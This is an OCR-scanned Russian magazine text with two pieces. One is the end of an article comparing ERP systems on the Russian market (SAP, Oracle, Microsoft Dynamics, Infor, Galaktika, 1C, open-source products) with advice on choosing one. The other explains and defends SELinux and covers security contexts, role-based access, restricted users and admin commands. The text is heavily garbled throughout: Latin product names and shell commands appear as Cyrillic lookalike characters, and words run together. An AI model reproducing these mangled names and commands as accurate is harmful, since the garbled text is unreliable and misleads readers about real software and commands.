ков. Данная система имеет высокую степень внутренней интеграции 
модулей. 

Ключевые особенности 

Приложения от Огасіе, как правило, характеризуются мощной 
функциональностью. Это связано с тем, что расширение ЕКР часто 
происходит за счет поглощения ораклом независимых систем, 
лучших в своем классе, и последующей их интеграции в набор своих 
приложений. 

Обратной стороной такого пути развития является низкая степень 
интеграции систем внутри пакета. Дело доходит даже то того, что 
интерфейс приложений внутри пакета разный. 

Стоимость продуктов также не маленькая и не уступает БАР, а не- 



Рис. 2. Распределение российского рынка ЕРР (по данным 
ЮС) 

достаточное количество специалистов по внедрению и поддержке 
конкретных модулей обуславливает высокую стоимость и порой — 
отсутствие на рынке. 

МІСГ050Й 

Положение на рынке 

Продвижением бизнес-решений Місгозобі: в России занимается 
подразделение Місгозобі: Визіпезз Боіиіііоп. На первой волне высокой 
активности и продвижения своих ЕКР-систем на российский рынок 
Місгозобі: сумела захватить заметную долю рынка, которую доста- 
точно успешно защищает. При этом, серьезных причин для активно- 
го роста доли рынка данного продукта не наблюдается. 

Позиционирование 

с решениями ЕКР от мирового зобгѵѵаге-лидера все немного проще . . . 
и грустнее. В линейке МісгозоК представлено два продукта, отпо- 
зиционированных как ЕКР-системы. Это МісгозоК Пупатісз АХ для 
крупных и средних предприятий и МісгозоК Пупатісз ПАѴ для сред- 
них и мелких предприятий. Кроме того, имеются индустриальные 
решения для некоторых отраслей, например, МісгозоК Пупатісз АХ 
бог Кеііаіі. Надо заметить, что по сравнению с количеством индустри- 
альных решений от БАР и Огасіе Місгозобі:, конечно же, отстает. 

Набор доступных модулей 

Области, которые покрываются функциональностью Місгозобі: 
Пупатісз АХ, представлены на рисунке 5. 

Набор доступных модулей 

Функциональность Місгозобі: Пупатісз ПАѴ более ограничена (см. 
рис. 6). 

Ключевые особенности 

Місгозобі: достаточно активно продвигает свои решения на нашем 
рынке. Поэтому количество внедрений каждого из продуктов доста- 
точно велико. При этом, к достоинствам решений от Місгозобі: надо 
отнести более демократичные цены, по сравнению с решениями от 
БАР и Огасіе. К недостаткам — менее проработанную функциональ- 
ность. 

ІМРОР 

Положение на рынке 

Еще одним зарубежным решением, заслуживающим отдельного упо- 
минания, является решение от компании ІПЕОК. Хотя в российском 
рейтинге они не выделились заметной долей рынка, однако на ква- 
драте СаПіпег данная компания и их ЕКР-система Іпбог ЕКР БуТеЕіпе 
занимают неплохое положение. 

Позиционирование 

Данное решение предназначено для промышленных компаний с 
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Рис. 3. Квадрат Оаііііпег для ЕРР среднего сегмента 




Рис. 4. Пример конс(эигурирования решения 5АР Ви$іпе$$ 
АІІ-іп-Опе на сайте компании. 



так называемым дискретным производством: машиностроение, 
производство электроники, деревообработка и т.д. Это и объясняет 
небольшую долю рынка. 

Однако, с ростом промышленности в нашей стране (это ведь правда 
случится?), будем надеяться, что количество внедрений данного про- 
дукта будет расти.ю 

Набор доступных модулей 

Система содержит следующие функциональные модули: управле- 
ние производственными процессами, управление снабжением и 
планирование, обслуживание клиентов, управление финансами, 
администрирование. 

Кроме того, данное решение может быть интегрировано с другими 
продуктами от компании ШРОК: управление цепочками поставок, 
планирование и оптимизация, управление взаимоотношениями с 
клиентами. 

Ключевые особенности 

Стоимость решений от ШРОК находится примерно на одном уровне с 
решениями от Місгозой. 

Количество специалистов невелико, но нишевость и ориентирован- 
ность на своих клиентов позволяют данному продукту чувствовать 
себя уверенно на нашем рынке. Количество внедрений этого реше- 
ния на российском рынке небольшое, но стабильное. 

«Галактика» 

Переходим к российским системам. Пионером рынка российских 
ЕКР является компания «Ралактика», которая активно бьется за вы- 
живание в данном сегменте. 

Положение на рынке 

«Ралактика» была первым российским разработчиком ЕКР-систем, 
заявившим о себе как о лидере российского рынка ЕКР. Все эти годы 
компания активно развивала свой продукт и продвигала его в массы. 
К сожалению, сейчас движение дается компании все труднее и 
труднее. 

Позиционирование 

ЕКР-система «Ралактика» является взрослой и полнофункциональ- 
ной системой управления предприятием, ориентированной на 
крупные и средние предприятия. 

Набор доступных модулей 

Она содержит практически полный набор функциональных блоков 
классической ЕКР-системы (в терминах «Ралактики» — «конту- 
ров»). 

Полный состав ЕКР-системы «Ралактика» выглядит так: контур 
планирования и управления финансами (Ріпапсіаі Мапа^етепі: 

— РМ), контур управления человеческим капиталом (Нитап 
Сарііаі Мапа^етепі: — НСМ) , контур управления производством 
(МапиГас1:игіп§ Мапа^етепі:- ММ), контур управления проекта- 



ми (Рго)ес1: Мапа^етепі: — РМ) , контур управления цепочками 
поставок (5ирр1у СЬаіп Мапа^етепі: — 5СМ) , контур управления 
взаимоотношениями с поставщиками (ЗиррИег КеІаіііопзЫр 
Мапа^етепі: — 5КМ), контур управления активами (Епііегргізе 
Аззеі: Мапа^етепі: — ЕАМ), контур управления ремонтами (ТОРО), 
контур управления взаимоотношениями с клиентами (СизШтег 
КеІаІііопзЫр Мапа^етепі: — СКМ) и другие. 

Кроме того, для поддержки специальных задач предприятия раз- 
работаны решения, дополняющие функциональные возможно- 
сти системы ЕКР: интеллектуальный анализ деятельности пред- 
приятия по ключевым показателям — «Галактика ВІ» (Визіпезз 
Іпі:е11і§епсе), управление инвестиционными программами, 
управление НИОКР, управление недвижимостью, учет формен- 
ной спецодежды и вещевого имущества, консолидация и анализ 
данных в Ехсеі. 

Также существуют отраслевые решения для ключевых отраслей: 
машиностроение, образование, транспорт, энергетика и другие. 

Ключевые особенности 

ЕКР-система «Галактика» отличается более низкой стоимостью 
внедрения по сравнению с зарубежными системами. 

Очевидно, что она имеет ярко выраженную региональную ориен- 
тацию на российский рынок и рынок СНГ, на котором и занимает 
заметную долю, которую приходится защищать с двух сторон — со 
стороны зарубежных систем и со стороны наиболее активного рос- 
сийского конкурента — «1С». 

«1С» 

Положение на рынке 

Про «1С» в России знают все. Раскрыть, а тем более повторить 
секрет успеха данной компании пока не удалось никому. 

Ключевое направление развития компании — приложения для 
бизнеса. В данном направлении компания медленно, но неуклонно 
движется вверх: от маленьких компаний — к средним и крупным. 
Движение настолько неторопливое, насколько целенаправленное 
и успешное. 

Позиционирование 

На данный момент уже можно говорить о том, что решения ком- 
пании «1С» безраздельно господствуют в сегменте зтаіі-бизнеса 
и отъедают весомую часть в тібсііе- бизнесе. На очереди крупные 
компании? 

Набор доступных модулей 

Функциональность системы «1С: Управление производственным 
предприятием» представлена на карте решений на рисунке 8 (ис- 
точник — сайт «1С»). Она, конечно же, меньше, чем карта модулей 
решений от 8АР или Огасіе, но вполне может конкурировать, на- 
пример, с решением от МісгозоГі: Эупатісз КАѴ. 
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Рис. 5. Функциональность АЛісгозой Оупатісз АХ 



Ключевые особенности 

Главный козырь «1С» — низкая стоимость решения, помножен- 
ная на огромное количество партнеров по внедрению и на самое 
лучшее соответствие требованиям российского законодательства. 
Такая мультипликация сильных сторон образует поистине взры- 
воопасную смесь для борьбы с конкурентами. 

В качестве сильных сторон второй очереди — самые низкие ставки 
на специалистов по данному продукту. При этом надо заметить, 
что стоимость проектов «1С» неуклонно растет, и уже давно есть 
на рынке проекты ЕКР на «1С» за миллионы долларов. И вот в этом 
случае надо призадуматься — а стоит ли? 

Решения Ореп Зоигсе 

Отдельного упоминания заслуживают ЕКР-решения на базе Ореп 
Воигсе-модели. Это сравнительно новая для российского рынка 
ЕКР группа решений. Хотя сама модель решений Ореп Воигсе уже 
существует и продвигается на рынке очень давно. 

Наверное, большое число поклонников решений подобного рода 
найдутся среди молодых бизнесменов и ИТ-специалистов, которые 
впитали вкус Ореп Воигсе еще на этапе становления своей карье- 
ры. Поэтому быстро пройдемся по данным решениям. 

ОрепЬгаѵо ЕРР 

Некоторые факты 

ОрепЬгаѵо — бесплатная ЕКР-система с открытым кодом, 
разработанная в Испании. Имеет множество наград от Ореп 
Воигсе-сообщества. В России система поддерживается центром 
компетенции ОрепЬгаѵо Кп55Іа, который выполняет и локали- 
зацию данного продукта. Система работает через интуитивно 
понятный красивый ѵѵеЬ-интерфейс и обладает широкой функ- 
циональностью. 

Набор модулей 

Набор доступных модулей для данного продукта достаточно ши- 
рок: управление закупками, управление продажами, управление 
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Рис. 6. Функциональность ЛЛісгозой Оупатісз МАѴ 



складом, управление производством, управление финансами, 
сводное планирование, управление контрагентами, управление 
активами, управление проектами, управление отношениями с 
клиентами. Получаемый набор полностью соответствует таковому 
у взрослых ЕКР-систем. 

Кроме того, ОрепЬгаѵо содержит механизмы ѵѵогкПоѵѵ — управ- 
ления процессами. Система работает в виде ѵѵеЬ-приложения, на- 
писанного на языке іаѵа. Функционирует на любых операционных 
системах, поддерживающих іаѵа. 

Условия распространения 

ОрепЬгаѵо — свободна для скачивания, распространяется с дис- 
трибутивом Еіпих ПЬипШ, а также представлена версия в виде 
виртуальной машины для облака Атагоп УѴеЪ Зегѵісез. 

Сотріеге 

Некоторые факты 

Сотріеге — ЕКР-система с открытыми исходными кодами для 
предприятий малого и среднего бизнеса. Сотріеге неофициаль- 
но считается лидером среди Ореп 5оигсе ЕКР-систем. В августе 
2008 года журнал Іп^оѴѴогИ наградил Сотріеге премией «Воззіе 
Ашагб» в номинации «Лучшее в мире ЕКР-решение на открытых 
исходных кодах». 
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Рис. 7. Комплекс бизнес-решений корпорации «Галактика» 



Набор модулей 

Сотріеге включает следующие функциональные блоки: управ- 
ление заказами (Огбег Мапа^етепі:), управление снабжением 
(Ргосигетепі:), управление запасами (Маііегіаі Мапа^етепі:), 
управление проектами (Рго]есі: Мапа^етепі:), управление 
складом (ѴѴМ5 — ѴѴагеИоизе Мапа^етепі: Зузііет), производство 
(МапиГасШгіп^), управление финансами (СазИ Мапа^етепі:), 
бухгалтерия (финансовый учет), анализ эффективности бизнеса 
(РегГогтапсе Апаіузіз), управление отношениями с клиента- 
ми (СизШтег Ке1аі:іоп5Ііір Мапа^етепі:), управление бизнес- 
процессами (ѴѴогк-Поѵѵ Мапа^етепі:) , интернет-магазин (ѴѴеЬ 
Зноге) . 



Условия распространения 

Сотріеге представлено в четырех редакциях: Соттипіііу Ебшоп 
(обновляется раз в год), 5і:апбагб Ебійоп, РгоГеззіопаІ Ебійоп, Сіоиб 
Ебшоп (поставляются за плату, имеют регулярные обновления, 
поставляются через партнеров) . Функциональность СоттипПу 
Ебшоп включает только базовую ЕКР-функциональность и «тол- 
стого клиента». 



«Галактика Экспресс» 

«Галактика Экспресс» — полнофункциональная ЕКР-система для 
предприятий среднего размера в России и странах СНГ, сконфигу- 
рированная на основе системы «Галактика ЕКР». 

Условия распространения 

Система «Галактика Экспресс» поставляется в двух версиях: 
«Галактика Экспресс СРВ» — свободно распространяемая версия и 
«Галактика Экспресс ВРП» — версия, распространяемая по подпи- 
ске. Для системы «Галактика Экспресс ВРП» доступна полноценная 
техническая поддержка с гарантиями поставщика и обновлениями 
системы. 

5оІагі$ ЕРР 

Некоторые факты 

8о1агІ5 ЕКР — полнофункциональный комплекс, позволяющий 
в едином информационном пространстве выполнять типовые и 
специализированные задачи управления предприятием. Система 
изначально спозиционирована на российский рынок ЕКР. 

Набор модулей 

Функционально система поделена на ряд подсистем, объединен- 
ных между собой в следующие блоки: структура изделий (мно- 
гоуровневый классификатор, составы изделий, нормы расхода), 
технология изготовления (технологические операции, нормы 
времени, используемый инструмент, оснастка, задействованное 
оборудование, персонал, типовые и групповые технологии), 
взаимоотношения с контрагентами, складской учет, управление 
ценами, портфель заказов, планирование производства, дис- 
петчеризация, снабжение производства, управление закупками. 




Рис. 8. Основные функциональные модули системы «1С: 
Управление Производственным Предприятием» 



бюджетирование, управление задачами (ТА5К-Мапа§ег). 

Условия распространения 

Продукт распространяется на условиях оплаты лицензий. 

Практические советы по выбору 
рёшения 

Итак, после знакомства с ЕКР-системами, доминирующими на 
российском рынке, становится понятно, что выбирать придется 
в лучшем случае из 4-5 систем. И вот здесь, чтобы правильно вы- 
брать наиболее подходящую систему, нужно сделать следующие 
шаги: 

1 . Определить требуемый функционал системы. То есть зафик- 
сировать тот набор функциональных модулей, которые должна 
будет содержать ЕКР-система. На этом этапе это можно сделать 
просто, крупными блоками. Например, для автоматизации про- 
изводственной компании, как правило, потребуются следующие 
функциональные блоки: управление закупками, управление 
производством, управление складом, сводное планирование, 
управление продажами, управление финансами, управление от- 
ношениями с клиентами. 

2. Определить доступный нам бюджет на автоматизацию. 

3. Определить доступную нам стоимость владения системой — 
ТОО, например, на 7 лет. 

4. С учетом полученных данных определить 4-5 подходящих под 
эти параметры систем. 

5. Далее необходимо оценить функциональность отобранных 
систем на предмет соответствия нашим требованиям. 

6. После этого свести все полученные оценки в таблицу и пере- 
ложить ее на диаграмму типа Радар. В результате получится при- 
мерно такая картина. 

Фигура максимальной площади соответствует максимально под- 
ходящему под наши требования решению. При этом, если какие- 
либо параметры имеют разный вес, что вполне логично, то перед 
этим их надо привести к общему значению. На приведенном выше 
примере, максимально подходящим решением оказалось ЕКР2. 
Итого, по результатам прочтения этой статьи, мы можем заклю- 
чить следующее: 

1 . Мы увидели, что при выборе ЕКР-системы исходный круг для 
выбора не очень велик. 

2. Чтобы на ранней стадии понять, какое из решений может по- 
дойти, нужно спозиционировать свою компанию относительно 
рынка доступных решений ЕКР, сделать это по функционально- 
сти, стоимости, размеру компании, отрасли и другим субъектив- 
ным предпочтениям. 

3. Для корректного сравнения различных систем можно восполь- 
зоваться такими средствами, как рабочие встречи, оцифрованная 
оценка функциональных параметров, диаграмма Радар. Надеюсь, 
что при таком подходе, вооружившись знаниями и здравым смыс- 
лом, правильный выбор будет сделать нетрудно. ^ 
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■ ■ Евгений Зобнин (ехесЬіІ.ги) 




Бронежилет для 
корпоративного 
пингвина 

8ЕІлпих: министерство обороны США 
рекомендует! 

БЕІіпих снискала славу сложной в понимании и настройке системы безопасности, которая хоть и делает 
Ііпих намного более устойчивой к взлому операционной системой, но создает больше проблем, чем 
приносит решений. Такая точка зрения в корне не верна, и в этой статье я покажу, что БЕІіпих намного 
проіде и удобнее в использовании, чем это кажется на первый взгляд. 



Система ЗЕЕІпихІЗесигіІу-ЕпЬапсесІ Еіпих — Еіпих с улучшенной безо- 
пасностью) была разработана министерством обороны США и всего за 
несколько лет стала стандартом в области систем контроля прав доступа. 
Она была включена в ядро Ыпих версии 2.6.0 и впервые появилась как 
полностью работающая из коробки система в дистрибутиве Реб На! 
Епіегргізе Ыпих4. Впоследствии поддержка ЗЕЫпихбыла интегриро- 
вана в такие дистрибутивы, какВеЬіап, ОрепЗОЗЕ и ОЬипІи, а допол- 
нительные пакеты, активирующие систему, были добавлены во многие 
другие более или менее популярные дистрибутивы. Именно благодаря 
ЗЕЕіпих-дистрибутиву РНЕЕ5, работающему на серверах ІВМ, удалось 
получить сертификат безопасности ЕАЕбАидппепІебѵѵііЬ АЕС_ЕЕР.З, 
который ВТО время имела лишьодна операционная система — Тгизіеб 
Зоіагіз. БЕЕіпих существенно расширяетядро Еіпих, делая операцион- 
ные системы, построенные на его основе, пригодными киспользованию 
всферах, гдедоступ кинформации должен быть строго разграничен, а 
приложения, запускаемые пользователями, должны иметь определен- 
ный набор прав, который не выходитза рамки минимально необходимо- 
го. Этоделаетсистему привлекательной для госучреждений и военных, 
однако кажется не совсем понятным, зачем она нужна администраторам 
рядовых серверов, а ужтем более — обычным пользователям (в Еебога 
БЕЕіпих по умолчанию включен). Сейчас я попытаюсь этот момент по- 
яснить. 

Зачем это нужно? 

Создатели ЕІМІХнаделили свою ОС простым, но весьма гибким и краси- 
вым механизмом безопасности. В его основе лежат всем нам известные 
права доступа на файлы, которые определяют круглиц (пользователей, 
процессов), способных выполнять какие-либо действия над файлами 
и каталогами. Например, мы можем создать исполняемый файл и вы- 
ставить на него права доступа «-г\л/хг-хг-х», что будет означать, что мы 
(то есть владелец файла) можем делать с ним все что захотим, поль- 
зователи, входящие в нашу группу, могут его читать и исполнять, а все 
остальные — только исполнять. Учитывая тот фа кт, что все устройства в 
ЕІМ IX представлены файлами, такой механизм позволяет нетолько четко 
разграничиватьдоступ пользователей (их приложений) кинформации, 
но и кустройствам и даже к некоторым функциями операционной систе- 
мы (ргосі'з и зузі'з). Однако, у механизма прав доступа есть два серьезных 
недостатка. Во-первых, их реализация слишком топорна. Она хорошо 
подходит для отделения процессов от конфиденциальной информации 
пользователей, но абсолютно не подходитдля гибкого управления их 
возможностями. Например, чтобы дать какой-либо дисковой утилите 



(сі'бізк, например) возможность модификации хранящейся на диске 
информации, мы можем либо разрешить полный доступ кдиску группе, 
к которой принадлежитее владелец, либо запустить ее с правами 
пользователя гооЕ Как в первом, так и во втором случае мы создадим 
потенциальную брешь в безопасности: все остальные пользователи/ 
приложения группы получат права доступа кдиску, или сама утилита 
получитнаивысшие и безграничные права в системе. Ачто если нужно 
датьдоступ не кмодификации диска, атолько квызовуопределенных 
его функций (іосЕ)? Здесь права доступа вообще не помогут. Во-вторых, 
файлами в Еіпих представлены далеко не все ресурсы операционной 
системы. Огромное количество функций ядра скрыто в более чем трех 
сотнях системных вызовов, большая часть которых доступна для ис- 
пользования абсолютно всем процессам, а если процесс имеетправа 
гооЕтоего возможности вообще никакие ограничиваются. Если, к 
примеру, мы захотим запустить ЕТР-сервер на стандартном для него 21 
порту, который доступен только процессам с правами гооЕ нам придется 
всецело довериться его разработчику, поскольку работая от гооЕ ЕТР- 
сервер будетспособен делать абсолютно все, и ошибка, найденная в его 
коде, даст взломщику полный контроль над системой. И это из-за про- 
стой потребности слушать привилегированный порт! БЕЕіпих решает 
эти проблемы, позволяя чрезвычайно гибко контролировать отношения 
процесса и операционной системы. С его помощью можно ограничить 
процесс в возможности обращения ктем или иным системным вызовам 
или файлам, контролировать то, какпроисходитсистемный вызов, какие 
при этом используются аргументы, запрещать или разрешать привязку 
процесса копределенным портам, короче говоря, управлять возможно- 
стями процессов на самом низком уровне. 

Как это работает? 

Если бы ты читал толстую книжку без картинок, то здесьтебя должны 
были поджидать рассуждения о таких штуках, какдискреционный и ман- 
датный контроль доступа, РВАС, МСБ и других околонаучных вещах. К 
счастью, ты читаешь ][, поэтомутебе придется прослушать более простое 
объяснение. Понять принцип работы БЕЕіпих и заложенные в него идеи 
проще всего разобравшисьстем, что происходитво время его актива- 
ции. Что делаетБЕЕіпих для того, чтобы контролировать обращения про- 
цессов к ресурсам ОС? Концептуально можно выделить четыре шага: 

1 . Все субъекты (процессы) и объекты (файлы, системные вызовы и т.д.) 
взаимодействия помечаются с помощью специальных меток, называе- 
мых контекстом безопасности (процессы во время запуска, файлы — во 
время создания или установки ОС, их метки хранятся в расширенных 
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атрибутахФС, системные вызовы — при компиляции модуля ЗЕЫпих). 

2 . Когда субъект пытается произвести какое-либо действие в отношении 
объекта, информация об этом действии поступаеткобработчикуЗЕипих. 

3 . Обработчик смотрит на контексты безопасности субъекта и объекта и, 
сверяясь с написанными ранее правилами (так называемая политика), 
принимает решение о дозволенности действия. 

4 . Если действие оказывается правомочным (политика его разрешает), 
объект(программа) продолжает работать в обычном режиме, в про- 
тивном случае — она либо принудительно завершается, либо получает 
вежливый отказ. В реальной ситуации все это выглядитпримернотак: 
один из скриптов инициализации дистрибутива, имеюідий метку іпі1;гс_1; 
(на самом деле эту метку имеют порождаемые им процессы, но сейчас 
это не важно), запускаетвеб-сервер АрасЬес помоідью файла/изг/зЬіп/ 
бирсі, который имеет метку Ы;1;рс1_ехес_1;. Каки все остальные действия, 
запрос на эту операцию поступает в ЗЕЫпих, в правилах (политике) 
которого указано, что іпі1;гс_1; нетолько имеет право запускать файл с 



Ограниченные пользователи 



Кроме ЗЕЫпих-пользователя ипсопбпес1_и, который по дефолту 
присваивается всем юзерам системы, в целевой политике 
также описано несколько непривилегированных пользователей, 
которых можно использовать для создания гостевых учетных 
записей, процессы которых будут очень ограничены в правах 
(возможности и различия этих пользователей смотри в таблице 
«Дефолтовые пользователи ЗЕЫпих»). 

Чтобы создать такого пользователя, достаточно выполнить 
следуюідую команду: 

# изегасісі -2 х§ие5І:_и имя_юзера 

Кроме этого можно сделать его дефолтовым, так что 
ограниченными будут все вновь созданные Ыпих-юзеры: 

# 5етапа§е 1о§іп -т -5 1;аг§е1;есІ -5 "х§ие5І;_и" -г 50 

сІе-Раи11; 

Посмотреть список текуідих ЗЕЫпих-юзеров можно так: 

# /и5г/5Ьіп/5етапа§е 1о§іп -1 



меткой Ы;1;рс1_ехес_1;, но и то, что при запуске этого файла процесс и его 
потомки должны получитьметкуЫ;1;рс1_1;. Теперь в системе появляется 
один или несколько процессов АрасЬе, помеченных какЫ;1;рс1_1;. Каждый 
из них будет подчиняться правилам ЗЕЕіпих, относяідимся кэтой метке, 
поэтому, если в политике указано, что Ы;1;рс1_1; может получать доступ 
только кфайлам, помеченным какЫ;1;рс1_5у5_соп1;еп1;_1; и 80 порту, АрасЬе 
не сможет нарушить эти правила (перевесив его на другой портмы 
попросту получим ошибку запуска). Резонный вопрос: откуда берутся 
правила? Их пишутлюди, а точнее — мантейнеры дистрибутивов, что 
не мешаетсистемномуадминистратору исправить их соответственно 
своим потребностям. Обычно правила загружаются на первом этапе 
инициализации ОС, но с помоідью особых приемов их можно подсунуть 
и в уже работаюідую систему (не перезагружать же сервер с аптаймом 1 ,5 
года только для того, чтобы разрешить ЕТР-серверу ходить по симлин- 
кам). Типичный объем файла политикЗЕЕіпихдля основных приложе- 
ний и сервисов дистрибутива может соде ржать до нескольких сотен 
тысяч строк, поэтому, чтобы не обременять админов рутинной работой, 
были созданы инструменты для их автоматической генерации с по- 
моідью обучения (например, утилита аисІі1;2аио\л/ позволяет составлять 
правила ЗЕЫпих на основе лог-файлов подсистемы аисііі;). В следую- 
ш,их разделах мы подробнее остановимся на этом вопросе, однако для 
начала нам следует разобраться с «политикой управления доступом на 
основе ролей». 

Упрабленкшюступом на основе 
[золей или КВАС 

Само собой разумеется, чтоЗЕЕіпих не смогбытакрадовать военных, 
если бы в его основе лежали только метки, определяюідие контекст 
безопасности, и механизм разделения доступа на их основе (кстати, это 
называется «мандатным управлением доступом», и многие ошибочно 
приписываютегоЗЕЕіпих). Из-за своей низкоуровневости такая систе- 
ма безопасности была бы слишком сложной вуправлении и негибкой, 
поэтому создатели ЗЕЕіпих снабдили ее еіде одним уровнем доступа, 
именуемым «ролями». 

Когда мы говорили о меткахЗЕЕіпих, я намеренноупустил из видуодну 
важную деталь. На самом деле контекст безопасности (метка) состоит не 
из одного, а из трех компонентов (есть еіде и четвертый компонент, но 
об этом пока не стоитзадумываться): имени пользователя, роли и типа 
субъекта (тот самый компонент, который оканчивается на «_1;»). Каждый 
пользователь БЕЕіпих (который можетбыть связан с учетной записью 
пользователя Ыпих, но обычно все Еіпих-пользователи отображаются в 
БЕЕіпих-пользователя ипсопбпес1_и) может выполнять несколько ролей, 
в рамках каждой из которых, ему доступны несколько типов субъектов. 
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р$ х2: список процессов и их контекстов безопасности 



а каждый субъект, в свою очередь, может и меть доступ к некоторому 
количеству объектов. 

Каки группы пользователей в классической модели управления досту- 
пом иМІХ, роли используются для наделения процессов пользователя 
разными видами полномочий. Однако, фактически они нужнытолько 
длятого, чтобытонко регулировать доступ пользователей кданным, 
то есть при сопровождении компьютерной инфраструктуры больших 
предприятий, сотрудники которых могутиметь разныеуровни доступа 
ксекретной информации (то есть, те самые военные и госучреждения). 
При использовании 5ЕЫпих на обычных серверах, роли не играют 
большой роли (парадокс, да и только). Любой Ыпих-дистрибутив, из ко- 
робки оснаіденный ЗЕЫпих, поумолчанию используеттак называемую 
«целевую политику», которая предполагает наличие всего нескольких 
обидихВЕЕіпих-пользователей и ролей. Например, целевая политика 
Еебога и РНЕЕопределяеттолько двухдефолтовых пользователей (на 
самом деле, есть еіде несколько специальных пользователей, но обычно 
они не используются) и две роли: пользователь5уз1;епп_и, роль5уз1;епп_г 
и пользователь ипсопбпес1_и, роль ипсопбпес1_г. Первые используются 
для запуска системных процессов во время инициализации системы, и 
в политике четко указано, что запускаемые пользователем 5уз1;епп_и (ко- 
торый имеетроль5уз1;епп_г) приложения должны получать конкретный 
тип субъекта (например, Ы;1;рс1_1;), определяемый типом объекта (файла), 
из которого они запускаются (например, Ы;1;рс1_ехес_1;). В их отношении 
действуют строгие правила ограничения, о которых мы говорили в 
предыдуідем разделе. Пользователь ипсопбпес1_и и роль ипсопбпес1_г 
предназначены для обычных Ыпих-пользователей. На последнем этапе 
инициализации системы запускается менеджер входа в систему (он 
работаете домене 5уз1;епп_и:5у5І;епп_г:[одіп_1;), который принимает имя 
пользователя и его пароль и запускает шелл/графическую оболочку. Од- 
нако вместо того, чтобы сохранить те куідий контекст безопасности, либо 
изменить его на 5уз1;епп_и:5у5І;епп_г:5Ьеи_1; в соответствии с правилами 
политики 5ЕЕіпих(если бы такие были), он обраідается кРАМ-модулю 
рат_5еІіпих, который сообш,ает5Еипих, чтозапуіденный менеджером 
входа процесс (шелл или оболочка) должен получить контекст ипсопбпе 
с1_и:ипсопбпес1_г:ипсопбпес1_1;. Смысл этого перехода втом, что целевая 
политика ЗЕЕіпих имеетправила, которые разрешаютприложениям, ра- 
ботаюідим в этом контексте, делать что угодно, втом числе — запускать 
другие приложения. Однако, если пользовательзапуститприложение, 
в контексте безопасности которого указан ЗЕЕіпих-пользователь 
5уз1;епп_и и тип, для которого в политике есть правила, процессы этого 
приложения будутограничены в правахточнотакже, какесли бы они 
были запуідены во время инициализации. 

Если говорить о контексте безопасности файлов, то здесь роли не ис- 
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зетападе Іодіп -I: список имеющихся БЕІІпих- 
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пользуются В принципе, и второе поле всегда равно оЬ)ес1;_г, а первое 
будетлибо5уз1;епп_и, либо ипсопбпес1_и, если это файл, созданный 
пользователем. 

Таким образом, можно сказать, что при использовании целевой по- 
литики значимым полем контекста безопасности остается только тип 
субъекта/объекта, тогда как поля пользователь и роль просто опреде- 
ляют отношение БЕЫпих к процессу (либо он находится под контролем 
правил, либо нет). 

Работаем с системой 

Главное достоинство БЕЫпих в том, что он абсолютно незаметен для 
многих администраторов и обычных пользователей. Приложения, для 
которых есть правила в политике, будут автоматически ограничены в 
правах, остальные программы смогут функционировать какни в чем не 
бывало. Однако, время отвремени сисадмины натыкаются на некоторые 
проблемы в работе системы, которые вынуждают их отключить БЕЫпих. 

В этом разделе мы разберемся как решать эти проблемы в рамках воз- 
можностей БЕЫпих, но сначала ядам несколько важных советов. 

1 . БЕЕіпих должен быть включен. Глупо отключать БЕЫпих только по- 
тому, чтотакрекомендуютделать многие сисадмины и пользователи. 
Работу штатных сервисов он нарушить не может, а если тебе нужно 
расширить возможности какого-либо приложения, это всегда можно 
сделать с помогцью изменения мета-настроекили отключения проверок 
для определенного типа субъекта (позже я скажу, как это сделать). 

2. «-2» — твой друг. Да, вся эта возня с контекстами безопасности мо- 
жет вывести из себя. Но есть множество инструментов, которые позво- 
ляют выяснить текугций контекст безопасности процессов и файлов: 

$ ісі -2 
$ р5 аих2 
$ І5 -2 

Найти файлы с нужным контекстом: 

$ бпсі /е1;с -соп1;ех1: ' *пе1:_соп-Р_1: ' 

Восстановить правильный контекст файла: 

# гезііогесоп -ѵ /и5г/5Ьіп/ІтІ;1;рсІ 

И даже узнать, каким должен быть контекстфайла и сравнить его с 
текугцим: 

# та1:сІіра1:Іісоп -V /ѵаг/ыыы/ІтІ:т1/* 

3. Скажи тѵ- нет! Во время установки дистрибутива все файлы по- 
лучаютопределенный контекст безопасности, а все файлы, созданные в 
процессе работы, — контекст безопасности, определяемый правилами 
на основе родительского каталога (например, если создать файл внтури 
каталога /еіс, его тип автоматически станете1;с_1;, а для файлов каталога 
/ѵаг/ѵѵѵѵѵѵ/ЫппІ — Ы;1;рс1_5у5_соп1;еп1;_1;). Однако это работает толь ко в 
отношении вновьсозданных файлов. Во время перемегцения файла с 
помогцью тѵего контекстсохраняется, что можетпривести котказу в 
доступе (например, АрасЬе не с может пол учить до ступ кфайлу, если его 
тип не Ы;1;рс1_5у5_соп1;еп1;_1;). 

4. Маны — наше все. В дистрибутивах Еебога и РНЕЕесть большое ко- 
личество тап-страниц, которые разъясняют все ограничения БЕЫпих 
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Управлять БЕІІпих можно и с помо- $етападе Ьооіеап -I: список мета- 
щью файловой системы зеііпих^з правил БЕІІпих 



В отношении сервисов и демонов. Например, на странице 
Ы;1;рсІ_5е[іпих(8) описано, в каком контексте безопасности 
работает АрасЬе, какиеу него есть полномочия, какие 
контексты должны иметь доступные ему файлы. Теперь 
разберемся стем, что нужно делать, когда ЗЕЫпих начинает 
мешать. Обычно это происходит вследствиетого, что админ 
пытается включить определенную функцию сервиса или 
как-то перенастроить его, а ЗЕЫпих начинаетсыпать на 
экран предупреждаю [ДИ е сообідения. Первое, что нужно 
сделать в этой ситуации, это проверить лог-файлы. Главный 
журнальный файл ЗЕЕіпих носит имя /ѵагДод/аисІіі/аисІіІ;. 

Іод. Туда поступают«необработанные» сообідения, которые 
могутбыть полезны другим приложениям, нетрудны для 
чтениия человеком. Поэтомусуідествует второе место, куда 
поступаюттеже сообідения, но в гораздо более понятном 
формате. Это файл /ѵаг/іод/теззадез, в нем сообідения 
могут вы глядеть та К: 

# §гер "БЕІІпих І5 ргеѵеп1:іп§" /ѵаг/1о§/те55а§е5 
Мау 7 18:55:56 1оса1Іі05І; 5е1;гоиЫе5Ііоо1:: БЕІІпих І5 

ргеѵеп1;іп§ біірсі (Іі1;1;рсІ_1;) "§е1;а1;1:г" іо /ѵаг/ыыы/ 
Іііті/іпсіех.ітііті (Ііоте_сІіг_1;) . Рог сошріеіе БЕІІпих 
гпе55а§е5. гип Беаіегі; -1 сІе7е30сІ6-5488-466сІ-а606- 
92С9-Р40СІ316СІ 

Здесь все должно быть понятно: ЗЕЕіпихзапретил субъекту 
Ы;1;рб_1; (веб-сервер АрасЬе) доступ кфайлу/ѵаг/ѵѵѵѵѵѵ/ЫппІ/ 
іпсІех.ЫппІнатом основании, что последний имеетнепра- 
